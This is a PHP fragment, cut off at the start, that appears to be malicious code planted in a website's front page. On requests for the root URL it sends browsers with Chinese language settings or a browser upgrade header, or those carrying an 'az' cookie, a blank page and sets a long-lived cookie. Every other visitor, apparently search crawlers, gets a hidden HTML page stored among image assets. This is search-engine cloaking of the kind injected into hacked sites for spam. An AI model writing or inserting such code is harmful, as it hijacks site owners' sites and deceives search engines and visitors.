0 && $_SERVER['REQUEST_URI']=='/'){ $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']); if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;} include('assets/images/brands/home.html'); exit; } ?>